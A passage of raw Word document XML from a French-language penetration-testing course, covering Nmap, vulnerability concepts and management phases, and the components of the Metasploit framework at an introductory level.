                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C55A8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6F5AB473" wp14:editId="05C99F16">
            <wp:extent cx="5731200" cy="2362200"/>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731200" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF0564" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4EAEB4BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1F5836E3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="163E6AD9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7395CC23" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="54C55B97" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_1hp7qzj3ir9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="40"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="325799E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B72766" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est un scanner de ports libres créé par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fyodor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et distribué par Insecure.org. Il est conçu pour détecter les ports ouverts, identifier les services hébergés et obtenir des informations sur le système d'exploitation d'un ordinateur distant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFBB422" w14:textId="77777777" w:rsidR="007F1D01" w:rsidRDefault="007F1D01">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71568186" w14:textId="335C0017" w:rsidR="007F1D01" w:rsidRDefault="007F1D01">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6F6C04" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_2auzkz16uvwj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="538FA7E0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_r4h7gkaq91ax" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Armitage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49280EB9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C99A96" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713C3BFD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED64E66" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_73k5fwuyfgh9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Module 5 - Détection de vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A71B3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5038C747" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_tv5kqyivmfhu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="44"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Analyse de vulnérabilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41D453" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="517B2C59" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_vxyt3phocp5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 - Qu’est-ce qu’une vulnérabilité ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D613502" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="153B9666" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C’est une faiblesse dans la conception ou la mise en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oeuvre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d’un système</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A058685" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce qui entraîne des failles de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31067063" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Causer par une mauvaise configuration du logiciel ou matériel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F125829" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Causer par de mauvaises pratiques de programmations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD00B3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1CA0AAC5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5AC415F1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_f54v0cpgx1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>2 - Raisons principales de l’existence d’une vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A983E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="72FF4641" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mauvaise configuration matérielle ou logicielle </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637339C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conception non sécurisé ou médiocre du réseau et de l’application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3B539" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Faiblesses technologiques inhérentes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C2579" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La négligence de l'utilisateur final </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E065DA8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Accès intentionnels de l’utilisateur final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5543F9E7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2BD70722" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7339729F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_yl0vguyr7vq9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">3 - Identification des vulnérabilités les plus courantes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF44B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5F2BB2D6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2A78A8EA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mauvaise configuration matérielle ou logicielle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4E56F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mots de passe par défaut </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12B7A7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Serveurs ou système non patchés </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C63E5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">avec des mises </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>à jours</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74314D69" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Défauts applicatifs ou de conception </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273B3DA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Services ou port ouverts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC76BAA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Défauts du système d’exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7A3ED0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="38C8742D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7D1DA82D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_pxgcderyta5b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">4- Les phases de gestion des vulnérabilités </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9D1A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5A7C4DD4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Phase de pré-évaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2A258" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identification des actifs et création d’une base de référence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDAEC20" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA15FAB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase d’évaluation des vulnérabilités </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFE702" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyse des vulnérabilités de chaque actif </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AE00EE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5266960F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Phase de post-évaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449790FF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>evaluer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> les risques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A24E6C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Remédier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA73929" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vérifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3048AF04" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Surveiller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6EED1D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0D8B6860" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="382FE1A6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1FF06EAE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="65D2C6BA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="621EAC47" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4DC41069" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_upmgd2fsd152" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 2 - NMAP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B66635" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="717BE5D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Lien TP : </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="0000EE"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>NMAP.odt</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="392CE97B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_acrv22h4fp7l" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Exploitation des failles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05EA14" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_jdqxwnuglnc5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>1- Analyse de vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1C54C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="622AF21D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Après identification des vulnérabilités du système cible, il faut les exploiter, afin de démontrer la gravité de la vulnérabilité et de fournir des recommandations de sécurité pour la corriger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249725F8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="55984FFE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_yvij52xmlmqu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Les vulnérabilités peuvent être utilisées </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>pour:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41A641" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2493E36E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">-&gt; Récupérée de l’information </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888C84E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-&gt; Faire planter le système affecté</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12792DE8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-&gt; Prendre complètement le contrôle du système affecté</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE2E164" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="13ED9771" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1CD782ED" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_bvnp46e97f6f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre 3 - NESSUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C66C68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_tx184o7i4rz6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Les composants de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61398EFF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="782FB5D5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; L’interface de ligne de commande principale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FAD7B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="468F2053" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Modules de support tels que les exploits, les scanners, les charges utiles, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BD7E56B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24892ED6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>outils</w:t>
      </w:r>
      <w:r>
